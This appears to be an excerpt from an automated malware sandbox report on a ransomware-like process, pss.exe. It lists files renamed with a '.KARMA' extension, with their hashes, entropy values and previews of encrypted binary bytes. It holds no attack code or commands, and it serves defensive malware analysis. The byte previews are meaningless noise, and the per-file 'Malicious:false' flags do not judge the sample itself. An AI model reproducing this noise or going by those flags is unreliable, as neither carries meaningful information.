Preview: .Pn.J...T#.)..[.W...s.\.x./.....;.|.\b.Dw.N ..iy.J.P.....H....KARMA....4.."v..9.rc..F..a!6.Ld#J.!>.Y,4..7.....Tf.mN..6.92..Z=d...GSP..5..~Q.m...V.u...kH..(...+*. FYC.$Z@..<^ze ...C...;......K .iY...#..C....9.....h)&........Y......^C.0....2..>.V......b....q.x..\,...`.5.asJ7X3..?.........ci.[.8{.....?....$....j:..Q.h.a.$.x.0..uR..MhY...?...f....*.4..W.:..FZx..%.,..kK.D.....y..@E...i.;.Ba..ts".)..f&.8..n..W..8@b.}......./..#a....%->....xH../`q.k......9W0.g......A.`....]+.4._5..TU.:c%..............$Go..d.:.......h.hO........<P.JI...o."..%.....J/y...c.M.X.-.....H....7)..O...<s...L...F.... .b.... Eg..XD.X.9..._YQ..<W....r.$....!8....].,=...z..S..z{^?+Fh=.K....v.9yE...(....d...9...s.....2p..).c.V`..*g....D.(.b.w=...j.b~w...>@Dp..V...E.R....F......t..[....IH..'XQ_......l..@.(*......nUc"$....\VUlo..F.."..U.U..$.*i......H...;...h....tt...Cc..n.\.....i:...qm.`.pF......k3C.A.j_.o.(\S.pb1-....n.A=[...o...KW.8.= B...<.=.Z..v....4){..........3....9.+
C:\Documents and Settings\user\Desktop\QCFWYSKMHA.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.811695096551344
Encrypted:false
SSDEEP:24:dx/SJrU/gRUdOgjKyBYegROpYZocXwGMs/NnRRQSGbslgBMS2:vSW5ADyB4ocMe2SGb0QMS2
MD5:D4FFCE4D6877BAEBBB522E5CADED02CA
SHA1:3B5315C966D5048A351A2A08F1FE4807A5B586AF
SHA-256:BF8038905211A7F931D5E91EF4B78FCB45C2C36669ADD68A3D16A93246781025
SHA-512:CB338C8AFF5C2C897AE36A88FCE15F78D88E6FDBE5A912186E5B03ADDC52D11BE3AA4219C4FF36BEA608FB316500A88730D1CC08626996B4AD2576788D5FBD7E
Malicious:false
Preview: .V0g..z.4..;.$-X.4tk...5C.R.......d......U.*.g5..9z....d.<0...KARMA..T.hn/......"$.=1?R.0.U.......B.....LR......Q7.......FB..@t.W..)...e.......|....*c..o...-'HL.T...AZ...p...!,...Fpd....DL..;.V..J..f........x..t.h$..a..61&>>.......&...~:..8..`..r{.v.*n.+./o..V....jCZ.....OJ./.#&..u.CT..N...1......M~dt.sJ....Ia........Q?(.^.+#'%....B*E(...^.+.S$d../.Qc..<.J..[#.......1....=...bH....o............D.u.:..7!...L.7G.oz.Vw.+..%N.....ppe*C%.x.%......U'_El`.e...6...C....f4$.v.&...5{.=...h.y.....w...]v..K2....Y<2.?.-..mU.Po..j(..ar........N...U..u.Y....]...q..$..5.......w)x<.a.l0%.nT.M.^.]u..j.z.aJ.7..I.16g@.P1...6p4.-x.b.i..TR.,.5.>.C...D.c...c.EG.."p.Y.5.x9NH/..U.B.y......P...&..2...N*......mt..)r.o.x.E....P.k.k.zs..M.."......X.'....O7..)8]..S.fJH...}...b...R.o..w..PhrR3..I$b.=....,I..ou..[.s..........o..v<...R./L....tbU(.....*:..f+......_-.j.^...F.e..k.R=$..@...z.tg.;.{......R.PW.V*]J.C....]..Y(@..<....XV..e.y....I.P....V.u......._..v......
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\BJZFPPWAPT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822506072907368
Encrypted:false
SSDEEP:24:AoPhATkn6lQSIA5SJogvs/Tzz44LRm1VAwgbw8wgiKroh7BiyXKBrWM:AopJSI1J7qTzzTILixVrc7BiyX2
MD5:09B9E1074BAED7E85E9DD2379EF2DDF9
SHA1:553E23A92BA02AF432BB6F722D815FDB0BD845DB
SHA-256:9FD067B5A7DD6031E90D0EF9E671960FA6DDBB0B4E83F359EB69ADE4063E32AF
SHA-512:E5DADCCB67B5D329A439CB22D5D6F140D654A3F03FEE06AB86CC05F3DEEC69AC8CEE7CD210ED7C45E7791923A8E18105F2C666B8C55C11F6D173CE53B6E3D22C
Malicious:false
Preview: .>^d......).&.g_.6.]...p..Bs|...cDM.l.IE.`...{j..^D<...@.9......KARMA...._.%1...>ihaCG....Dp.#..4.K.g..=PjK<~.U`l...d.E,.Z+.q l..Bj..;b.$.`..Uf0..G...Q.........d...ec.4\....;..*.'.4.3...'xEH.f#..LcA..d..$...[6.63..Vb..3.c.4z...7$.8~...R<6O..%Q.Q@...4....J..F...A&yL.c.....8..l.".o...]...?.s........0T.S.<....H^H~..R.;r.??........>rR.................7...4..I{.8........el...^.q.'.O)w.]..#.C|......OL..^..n...u..T.. ..D.k.&...U..|........c...gI.@...a....U...X.f!XPp(n.B.!.h ....8.Q..Mf....HbW.T.+...R./"..O.DQ.^.Y.t....I@...H.6........M.p..G.Z..=...<.u...T...-.l.u...){..#]7..t..%..L..a.J..c...$..=.$h-.>.[..d...'`v..<q..u^....`<D.E=.VG=..9....]v"...dm^.}.8..Z|...."~1<N.Z{......_...W.%.}T...K@......#./.r2..C..ns..?.!5._w.0...Y..p...............E.&..j.u.].|,.`.......\.?v.kt.*2......i...w.....Y.....B.D.......}..&..8L.-.:BQ..V....Mact...h..cnF..5.p^....#hf..../".....NhB....C..9.y..@.o[Y.+..0...R...Y...6.n.."\.B[..*`...GVJ.j|...<....M._.../...S..?(.....
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.809728846675135
Encrypted:false
SSDEEP:24:uos26K2NeHJgp3CVLN11m2Ar3oFt6WMm9toL7zuD2:11w8pgpyVL9AD1s9toa6
MD5:F9EA9DC08E66C109E27CB43302F09720
SHA1:CCEE9CB0FF61A3688B7609606056AE412EFACBB8
SHA-256:0812A78EB76CEB97B92BBAF7EFEBB55E3CBEE04ECD9D5B0F246AB2D05037033D
SHA-512:E940CB434E5BF1E0ACBCDDAE87BEF470828F98C63805FA46352EBE7B1BF4AB7C8E57BD9CAC9ABABC034EDED4B15516A99F8BF5195E1B7869ED47B65B2BCE26C6
Malicious:false
Preview: C.U....D.W.8u..h.R.....<.2:...-..}.....8.R`*....d..C..%...+...KARMA..vh|S..|1....2.%2..-Do..#/T$..h...Z.u....{....e9..%D.@.aI.1...u.......[..@.`............% ..W..k.-..d.2.7.x...N.~... ....iLd.{....v1....TE..8...9..;|Yt...P..&.w,D..y...."..5......u..ff&...qk..j.."..o......z.i...@.F.......y._.@........[.%".\!BD........G....G.....H.0I......%..J....^..8'.-.../".P.Z..p.4<....=..yi...t..m9c;...M......*.A\.O:5I.....3g....o.H(.D....."..4J....{....c.....'!4...t."s...d..b...|.h...&?..g.. ..-;vW.}.$.x{..%.BCl....+...A..Y..........Z....A8....%..>.......R.L.b....._r.$I...Q..f&.7u.D.S....{].i...#..^.Z......n..........<..p.H..D.._7.FNK.+V..6.D..R3&8..{.c.G.q.....u,.uv..qe.p.]I;.~..{..../.UP:W^#po..n.....*O.....0..._i.......l<@..... ...~.v~&.j^l.J6.R.W.l.U..c4....6..d';.*..^6.2......XO....X..4L....J!.....F+.M....}.GK........~......<..?e..4z..v^k.Tp..&....R...`..gE.$lk..pmA.q......I......y.....O...u;-.0........-...ky..9h...$;..'..0.g..OA,.).L1]....
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.811268651205095
Encrypted:false
SSDEEP:24:TcINH4hlvMOURXwhd4KQyZasE9qvsDksCNWvalB5ciKpuB2nrlECi:4MH4hlvMOewhmy9eqE0WKBguBcECi
MD5:D6F84671D3DEA6E9B75165C041109374
SHA1:11D9692F5AA943E1E8FE38C8CB2025E58CA79064
SHA-256:6B31F2ECE9588DD723D3B34528F4706ED7195D4999B0D1B376352130AC9E5BC0
SHA-512:A9FCEAD3B3FC919779AE0FD77A5D58EF024AB1FAB03B1505CB36769B45A52A94E95338CC40458D427D865C6949617A0CDB5D20606C9F149A2248CE662302F099
Malicious:false
Preview: .......$.'.t).q.C.................T.lo#....X..f.?..Nd.m.}...KARMAe..P.o.....R.....z.J>o2.U.....I.I..M.....{.......r...7l.p.v.L.I..G2.Z...".4jX.0R.#.-..OD.......r..I*........{.(q-....._...p.4J..xXD....X.\Q...>..Sy..Qt....e.>`Uy5..;F.G......../r.B'.)cx....{Sr**...Cfbz...]]../..|....G...I.^....b..1K.u.v..tr.)...Z....`........w.d..+.\.....E...A*............L.^.m^...v..h...<;..9z.,........#@.Sg.V.y..L.O.7.......j....j.S.n..K.x..x..F......O...0 .|.P.....5B.rK@.$..q..$....N<X1.q...."....(a.#...I.!-......4..h....S..e`..C.V.y.s..~...:.N.QCD..-.%f.U.n+.a"..R.u..S...G.D.o.GJ]..V..X.T$..5....]d.H...e....>..hQ8h@.E.....Nv.6$...o|6..2.$.....'.../f4...!G...L...j.....e...K2m....*-LH.....@.......Z.u..2}.i...4.Z".....-.f.....qw.'..K^m.J,.....8..98.....i............JX...A..w...*LZ.".....o......a...c.._.?Qoqq.-..vo.r.P......T*.........f.c<8]...H.J...8LR../.zXA.[%..q....".1.!M.).~V..eN.n.*Y..+4m.z"64;.i*..q.A.?.h. ..ad5.W...6Z...&{.M).......V.wm.A5$..~.M_..sen.
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\EFOYFBOLXA.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81757232025939
Encrypted:false
SSDEEP:24:z4e+k0389GfD+T18fJLZTLFoEia6enyxhOQ5b9aVQGALoJ1t37Oora:zPw88fD+58rAaTyxsQcVQGh5/ra
MD5:B2C63A14DC226E90C5A776E69BC45107
SHA1:1A93EDFFDB5C80B862DE173C8D2B8FCF4AB50C4F
SHA-256:FC409361EF65E56F6C4F5805C2B5611CF59EE6781AB76C83BAE86DC318D3AE4F
SHA-512:203503F68EB9D178A1A31ACCA5BD30816699B71E803CD1850A5C03F571147031C69D2A83EE7EFDB50914ACD5E3D99D7F18E2C6A01028644D48B9F52E211F56CA
Malicious:false
Preview: .C......L.A."(u.RJ....Hl/...G........0...1%.v@]L....}.....N...KARMA.R4.B....K...LW.p.E4.C.,.&r.S.m...R>WX....'.(.w7.1.\t..H...G...Q_.l....0..J.$..S.tc...., .}..R.5:.E\..b/.:9qb.`..0..wg.S..=..U.8PN~..|j.w...Z......t9....nJ].v..I.r_T.{N..v...*.....{....gk....2..r..14si._..z.QHZ..3|{.>.FI.!d9.X.G......@.Aq7.........~.<.X...|)..4[ys.....;.6./...?......=K.X%.....?<....$wS.../..;....}$....}....N..B..........g..%W.....M..0..ts@vrg..N.`.../4.o.h`...(.bl.......I..G.2.e.B.HDv...$..].kz.k.*r.....".<.Q.).{4*.AB..Q"(].&R~...Z%.].T..B~Y.3..).....D.{.\2....jg..O...V./.....t..5...ovg..P0........M..d4..%r.7....ys.q....N.K.:.....c..}.`\..._.).....K.......k..L'uq9B..kxXa../.lw.L9...qU.\Z...7.S..T.!....,..@1......Z|.O~kk.`_....(.~a.v0.a2.i...*'.T..9..~.-........{.6.~.."=.A.l`.`...}.=.~.F.B...c<3y.y....>.P.........iB..8..z.K"...9c/. Z..!...K'@..1.>.....a..@Q...m..Q.J.......gt.......#.zq....,... H1....|................ZK.Y4..`h...].....\.M&.(.sd...g.v..s^|..`.
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819987576366232
Encrypted:false
SSDEEP:24:uGzPF3iVmoJIX35dkd6FZltCWaKnIiZI7kELHpkKxsRQFeIXdc9vxsXiK:nztSVmN52d6FZmW5IfkQyMVc9eXT
MD5:134009ABA8DCD310E3DEE8AF045F6874
SHA1:B33A3F4105BF6301BA3546C6FFD88797B07CAC79
SHA-256:8B1EA5DC0B36FF110928A3337D4BB9DF983DAC6E576A0FEF0F079673E46E57F0
SHA-512:905FBB1F543AD6CF7A65E49713812FE7B40A1630289A3561C2CF77CE6581C98455B6B68D4DEB333FFF0FF01EC836EC2ABDE0F6512A770DB6FC5CAB93A705A910
Malicious:false
Preview: v.pk+.I..t.q.Mf)....N.7.0..........:)Og..dC....;q....c...Zt....KARMA...Z..".....x6-2[".b..q{^.....&q..^.:+.]....V:r..BA...P.H.}....f......D0f..jg.....S.5.2....)..qt.Y.&..."..u..gZ...-I.8.r.....|....9.R.q..t.^..diZ..p.......o....C.....(..|..=*..N.......L[Z.8.:"*..T.I/..P..N.......\v....".4..L.9...u%..j..L....p"F.o.....!BrzEh8.......F.*.5z..}.....:.pG(..q.d........&$..N..h.&~.'.(.....'?"....R..".L...C...H7b$..oX.8.a..fQ..Wu4..|.<...;`...[s-d.?..^/..L...(z.EG..X.J..@JQo?..L.....nw......... .=.p....E.LN\.........k..u=..mM.......U"0pe..j(Rp..uAz.......K ..,.0.....f..~[......2X.......U...1......Nc..&.!5.s.s...<..x>.....i.%.L..|I.}6.5.vx.+jpzu..:..Z.fu...s(/].....%`.b..mN.. ..[.w.]....y...q)e.Il...H=Z.(..1..W....../.%.i...$.8.|.R%=..7.........6...~....dI..f....n...<...Y9i..*...J.......X.V..y.s.....-Tg..@...G....q...=.1l.C.. >s.E.-x.5.0....;f./}..;n...c.9..z.......:).M...t.]...H.a..]H:>.=b...wM.o.F...Q{h.j...(.T...c.9..XK.F..Q..../..l.......f
C:\Documents and Settings\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.836297220820901
Encrypted:false
SSDEEP:24:PYX48nATwYDZ0h88hqu2/gghYd0UuGPAr3YQuyNX5qlc3om:m4YAE9u8hqumYTf4bYhc3om
MD5:1AEEC87A119B9D92DA70AFC39ACEBF6B
SHA1:098CAC0893D447E3A0AFCAF550C724B5EB228B28
SHA-256:0B1C7EF9C64707CB9DBC4CD3962B16C386C7DB394D74FAE249D9C1114400DBD2
SHA-512:FBE227F3414BA8420CAD83530761BFADA2BC6BEE409E21F7DBF73D122007A1A1CD9D83A457E1A6FC5672D98F83AE735B869E1E385C01CE6CE838C412A74150E2
Malicious:false
Preview: &=5...h........I....J.........{..i=.%......T&.....#?l>...KARMAz..........@....*..... B.>f*.T..}So1......g<....h~.G..8.@.....G8>.K....#.....h.R%x.....q.:"dE*.#.}b..B....R9.;.y`.W...#~..........M......(-..?.]&...)..f..U.L.7...-......J.%V...oN.!r...Z."...W9.e......gy.B..V>.2..2. Z{f......Ug.....x...Jy.....8....h0T.e.S.......=......k.).6n^V.[...%Yn.n...6.5.....Q).......3='.6D..d.P.qn.....uZ..!............."< ...#...2...J....?."....]:z....w..AA.../...Y...Q..b..Y..U1RTa.3r....L|..dW.i"f....._."..g.!.N".....'.....,..'.*..y.PS..4(..l~....B...O.Gw.ez.>..2..%.Q...B..P0..RO}V...UM.@....B=......w..0.`.l.2...}&.PQ........U.%.`......[Z.hK......&.....c?...[.bA.4/..T....g|@Lw.de.&.JcA.....C....^3..t1.:BF....6.......\.....DLjYf...~[......."&.N@$.s..R...g.*j.[gT.-.om.Ia'......aI.?l?@!D0dH'...E.D.iM..#..+.....b.=E..W./+.uq..O.U.9...$P.......<.....E..u..y..}t'....tB1}...(..hk.G.~..A.X.:...i.1.A.N..*..X.B....xlP'..;...C.|.7.%E...+.e.....d
C:\Documents and Settings\user\Desktop\QNCYCDFIJJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814016358271029
Encrypted:false
SSDEEP:24:7uqTzUsCayQ2qdYcHkH7UbXxSbCR3WHhv74J9ODTz:7uiCpQ2oYcEbhC5Wx74fOXz
MD5:063FA7A40F8847FB0D80EE0E8AC73447
SHA1:95A8A90FA2B97E5B432E8938018C51A312C8CCCB
SHA-256:6B22A1E7C07445F43A2857DE8365132B2967E92EADFAF2626FE6178F8469FC74
SHA-512:E9788BF6943A5ED93674306C98C5CD76B5EADD43B991B96A09C1786B3F2669FB61C05395D05C7A250305A75C468CFA54E019E9927D27AB047196EC23A8F454C4
Malicious:false
Preview: ..X,.q.<..z._....S...):.0..*....ER........%..5.f..A.&..4...q....KARMA^.`..I....[J.m.........|..q/u]l.3.^...P.6...W&..<...[a......$.2.v..Y..IJ.....D_..\..A...F....I#qu...k..y.p.0n~/6..K.kQ......]._..J..7.....J.......i.....;.i..S...0..)[Q.v!f......S............(:....2V.g.p......,GN.}].....P.^.....$z...5`GD..d.CJ..)..Y.i.s...;I...n..QK..^......@jW.....u..1..'V.(..{..y..|@.m.d...@ER....3d..._...z........i..x.|.......D.6.S.hu..f...ri.+Xb......1..A`.YAS0`L...n....`X.....v.|2.]O.".>}.AQ>.../.Gb;w.j..n.K...MU..&..|.....;G..,.t...6......}.Vj..n....F.}.f...4N/fu.s8......<;."...6..Rv]......Z..i...&..+.t.a....6.D.K,.z.cV..~S.Z._.v..95a....t.n....V.A.......P .H*n#.P^..fQ..-.g..s..C.-._..'z....Y......7.!S..!..^.A.....m.-...........r&.n..C...1.4M....]."4l..f.j. . .T....}in.:-..dW-{.4.... ...,h....N..F.*..F$.y.*..`D..E..}.,..{...Py.q.u...e[.a.%.....Ah...,B....M....PQ......:k.*H.,?.*Pu.|....6..u.7.. .[<Y.a.!..pa....:..0...Oc...../~4.....X....{....b.m....
C:\Documents and Settings\user\Desktop\QNCYCDFIJJ.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.802170980754228
Encrypted:false
SSDEEP:12:Q8qgZZBsNHhM4TqlFQfijgza6wr8oc+oHp+hYqlJAeXOB7TM5ZAnMj4ZgCsnmCny:6gv/4KCKiavr8oc+uAhYQLXiAaA4yZA
MD5:1F8A53729FA04BA72E8157F54A8FB6C1
SHA1:9716FFC0FBFFDA8075904C25B7BB7220E183FA35
SHA-256:DFB2886CB00065B81B8603B3C25C002007773194DD330938C4BF7ED41EC04376
SHA-512:320F543C24126E5EB202DCDA62119CE1C60BE0DA1B3D7A6DCE1BDD0518CD2D4C6EBC5E24E5106688A7F1E44B15B080A4D9CF531B78C0E023EB5C8F30F87EEB12
Malicious:false
Preview: %..h.......:|uN'7..L......a...T$A.+....e...+...K....rG....KARMA.J.T.k....T..8h...i..3.Ed.!....5................G>^..[.....V.e:6n.yc....8......."{.......+'.G...t...a.t...~.M.........q......Dq*.!.....T...F.w.......sx...0 !....+....O..w.(..R>.xk..../.5........I...ME_;..e.(..3..ki....:.E.......Yq!.....k...9.E.9_..}..7E....f.....2...0-)....U...H..=...%.{J.......v.1\.gT...Y......|.b..../.3K.6.o ..!..$..G.....F.3....E.eJ.K_.#.$...oDK.....JN..O....$}..Y2.|FB...4..B...c/c......N..&.J.U...q2iS...<J.N..k...o..(..'|.o;.k..y.6..Q..k.;....F...^....J.......M..ww.....w....u.wP#${."..M...X9>.t..~..........'.z!.+WLY.n..we..-(%.M..&....X]7_C0.....X.....N..R.x..>..:...H..{..B....r..o.....MR.=7..K...+......:.u:....T...&...e'...H4....e..ZY7..N.o...T.n..RK.o..7.K..l.1.].......J...Q.VQ..!.Q.d..b%. .h.p..j..L..\]..B.&.^.-..5..Pt|7.C..'..L8]..P.j...~....%..3q...l...,...z..s...K......e. .[..'`.@./...~....T.....}.j.^.-.u8z..h.,k...1.9m}..{c..9o@.xx.
C:\Documents and Settings\user\Desktop\SQSJKEBWDT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.815072333316551
Encrypted:false
SSDEEP:24:vaVT2jq7a1EKEjjqDJorVh7NOKnizW3pdyws5PVf1xkcSHz:O2UOEzjeorN7Ksby35tNcz
MD5:9C523DFF5B5ADA1CE3FDC2E8A0479AAD
SHA1:64FB9BBCF46DFCA6CA5F46706510CC587D23836B
SHA-256:B1FA5F4F069272C701CF931AC5250B6CB30609F623F2CB45F3F4D9D273E21A57
SHA-512:5EF5E74715C8D7DEF8F4539B042F474DB13134935F1547D62C58ED31083B02BB01D564208916E776D44F20B4B9F7BCAD32FEC53EAB3E33CD8C3846329812A22B
Malicious:false
Preview: ...K.J....`....J.......~E.v...\"....K...=}z....6.f...uF...KARMA.*.X.x.@..)I.......`..W.&.d"...GF.`..v`B^...w.2.~MFRJ....f%..H.-,G.3.....20....`........T.........I...H.E".......t...#.HU..Sq.0/.g...g=.....$.I(.Q..a..W.3.&+wY...?F]X..I,....}....e..k..mFg.5@..9.2.,....~.o......z...]..".......Vc.c...m..b.1d.:...q..E..)Q.....6.k..l.%..+.<.o. ...O...-aa....J.dw.....6(.fW<\..P.o."...~.....G...+..y.V.bjI.wJ....f......|.....3CJf.7.2....=6.yj..c*.o....@...K.C....5.?.RS#..:i.6.%qIu.@....%.ar..cJ.....=.F...z....1..]v..i.....g.c.L..gGb...7...i-H y...rsVSGB&.dv.T...queWe.=.<....C........u.?h:W..:.)..R..I..,.Q.P..,....."A..../..i.Bi.......}DE.@.|l..-F....29..G.g88.(..4..~.^...]|.@.l.F..W.....,.U.A.3.+.r3...4.uv!...WP...0.8..hS.t...({..u........b..bo$.E..-.^x.e...-}.2.....xgU.X.o..|.T.o.m....W........8..Pe(...C...".K......0^'..(.%bB.X?.#c.2...W..n>.0'q.w<.C.,Vk{..dy.4..v^.......v..L.r^?21.t...B....S.D..........$....[...$$..F.D.Q..e_..|z._.^.:3.....n.Z..=..z^.
C:\Documents and Settings\user\Desktop\SUAVTZKNFL.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805569226974544
Encrypted:false
SSDEEP:24:AuW95wHllXXfQR+v45VJmxC29YEXiL7lgHcclRklM+agTHDpSs327Lxz:pI8nnfs+v46qEXiL7SvvkaFgR3+9
MD5:E14BD386F3D926DB3BE076472E487359
SHA1:0BAD4E95351C50406DECB9965F0AC599BB1CAD73
SHA-256:A9EB80C5D668379285B009D6D47D9B5E9AFE11FF3E077AC20D18CC0915F1331A
SHA-512:C6B2B40F350B472701FACFDE15C38D31C1DE3708850F8C46670AEF65DBDA2AB617542964BEB5D683223AE91C2D7256050F8AD9A97B7D18D1E5B4B0DA24A75637
Malicious:false
Preview: ...........?.&P. .2.... .Rj+..........&.=.....A.*9...1.......KARMA.Uf.D.;,.JGR+.0...iU...v..0.....w..o...w....i...h.R.....E&l.W....]..j.....aX...<....5...Z.h.......>.......\o....1.&..l.:^..x.W4...q.6`2..7.f.......4..v...}...H."..G. .P}.../.k.....8w..<(..^..B.c.....?nz..bf..b.".&*dIN....lK...A.6..d.Tg.j....Z....=..=...*E......Z.8..].5.P..V..o...z..WV.q...a2.w?w..o.f6....\...~.s..<......-..*..\...'..._...g .....VO.%.~.......d.....F{Q.o.~....>O..gD.(v.....*..`.,w..{N.AJo<.....e.`.....a^>[X..<..!..|..9[...K.........=71.\...V.G.=.K.6.s...D..P)FA...E..~.q.7^#.6W.;..).HOv.N.....b.T.<......?T...Ux=..i"2E.oU....S.7.L..(.!....DT...5."KKf...UQX.x..[C...h.L.zM.,#..V.y7T'."a.$.4......k..tL.3......+...h..........d.....e.>.|.@. .}<l..#K".^.".fx/......8.....f..).6..wQF.L.tKQ.Z./..<...!z}..Y.Q<q4..1...aL..,.MH.!....A.......J.h ..;.W..H..nC\M.b._B0....M.....r.M....D.u.b..N..&).v.:;=.(.7).......*.P-.M....U.V.(.&.).z..KI>.g..P+.8....<8.x...S..t*...........
C:\Documents and Settings\user\Documents\BJZFPPWAPT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8483544477333265
Encrypted:false
SSDEEP:24:bSIKr7R7MKNGiRfp8phYILLtc3YH3sxEi:bSIKPjNVFiH1LRIiuEi
MD5:82044CDDF69185B6CC3F5408EB0E5F72
SHA1:0622C895ECF0B48DEB9089799F21375B3883A87B
SHA-256:7CDE1BA681C3B476D8FC20FB221C2967C8D112CE185A39D44A1A6FD3D66FD695
SHA-512:D8C667F3CCED44E4E90840A68A515BBE9C3A940253E2B5080E05501A9EAEB855B0481960A1F6E8EC31F0943690B3530B2D0219066498A661DD94CA6BA046319E
Malicious:false
Preview: .X.A)v...t.Y:.bz...4.:.^..,..........?...KM..l....N.(.'S>.f...KARMAb.em.59fQ.....].V]...a:.........B..NO.166....8s..D...I....@\1.p......aM..t.g...__..o7.0..y.M...e}...8..^.`..L2...DOX...$...Nu....K......x`.W..F...no...woo..).s@.......u.1....Q.o..S!86H.du!L..A.mxt.@P6..3d..7....6.5WC<I..jx*..>..9.Z.1.......q.g..H.j.l..z....r.0.!.L.n ...k...I...}..+....DX.k."e."b.ox.."V]?.n..E...,?E...@..m>M...-.R.....b...P..>.r/.....f.".......pR0. ..n.'..r..y.).S.....=E...V=/w..||..".....&......MM.....P..5.f..q.qg&74<.X..E.......@..Z..E".B.J{..E.d......^..a*t.U.+|..~i.%8.2lW8t.E^mCT.|./.. .....q...0..:.Q........w....9...f.6.........+>-..\q.5.n.|R*./.1B8.W.D..|.<}#...K.8........k`....Cv..V....d.`.8.VG.~..W....[..._.L..%xR+..(.=...xC....MdS...{.Y...+...G...../.F`.Kr...)~..K*.Z1b..../.\.&/.#34I-.....1VSY..yT..ap...i.hX..#....yb..OOZ.S.........h=...'<B.}.w.....aj..............c.l`g......v,P.I.7.DG....t...@G..^....j.(.O.F..K..|..r..........#..'7.^@i...).
C:\Documents and Settings\user\Documents\BJZFPPWAPT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.807591287377502
Encrypted:false
SSDEEP:12:o1ID8PdaVYLRiXKQ+JBo/XgYF5sK9L6a+AXuDU29YecZHAJxkS/rK9Y2KHYOBapo:AIIPdU4GaJBMQmjV+kSl9YHL9Y2KHNh
MD5:44EAFDB13BDD90CDB59FDC3A2D18FF80
SHA1:2AF6D3C14DDB4AE33B03A69F1B14310A55DFA29C
SHA-256:32D5A008B43FE3D0169F1573C91E6C686124FC4D1FEBE645F2470371E205E1C0
SHA-512:60BCD7614D07CE391FA60A8DFECD2D05AC26E711F7CF4065C79082865A9264FE64C8BCC7BE6A574B91473EBCF3176430DA21BACC370C5F097642781054EC8C3A
Malicious:false
Preview: .r.5Y.^j...5.@.c{../n...#.\....Z.ei..f)..?..r..P..zI5........KARMA GH..n.k.f>.XC..vF..r{.!.9....fJ.SK......&...;u...lM6....!.....b.`'>.K..1.)..K..M........JhEv..9A.T%.....d6...-T9.t..~k.u..'A......t.2.....s........\;.u...n.V.]f.)G...a..1.(.K......GSBEn.....)..~{...,...Q....CA..0.e...9Q....f+...-m...........-4qQH...e5v....F.4,......v.f..q..........pr....>Ew.yeO.S..4p.{#.:.........n...OWi=...5.e,n.?.8.24..2+..^..M.i...R......j*...'.w....8W.0H...w.g^Yf<f..[..s...2..X..?.;.....t.9....hm>..o.)h..../.F.......[Ql...g.....&.A..D5.^.Z..;..f(..S.#..J,A.9l..R..5........`a*.j.j...m?.0m.7...BHG.#..'%..=S1"D1.........(.w..*.xp.....d...../......Tn.Ad)...$..d..D.om./...R......9.)C.._jnVu>/......{..\y...4"zt....G...:x....H.\...._.J........X.}.8...k....O.T...*z.=K<..\.....Y......N..../....N.....&S...q.:f.hp{........|<.s.)x',k..!........O_(...3..j....Pi..n.2...Mh.N...]<....H.:<e....IY.E..m...+.u6L25.>.t.(.i...kF.....t.v\c.'.G....J.h.:..>.Y...[7...f..q<y...(....w
C:\Documents and Settings\user\Documents\BNAGMGSPLO.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.789259349306412
Encrypted:false
SSDEEP:24:P14kOJ3rE+bqFCcneD6PMGlDc9JkddyiooFkuRSEv7oxLyQR/fDR:P15OJ3rmF7LlCJkeGfoxLymjR
MD5:DA18E7A8B3EAEE39212594F6EB04DDDF
SHA1:B70B9D864163A50E2B7DFDD3D01D2DC0DA52D276
SHA-256:D4EB85C16EF36C37813CD9EA1D92A3C456D61BC272304F9EB7103B8CA40C4900
SHA-512:007DC91416CE28A93673496AF60A7B7E282055FD9C64BD2D1EE7AFD0CB8D491B5C55DB525D771D2E00FA24D2E5A4AEE41EB24B2F9426247C00927F80C3FBC782
Malicious:false
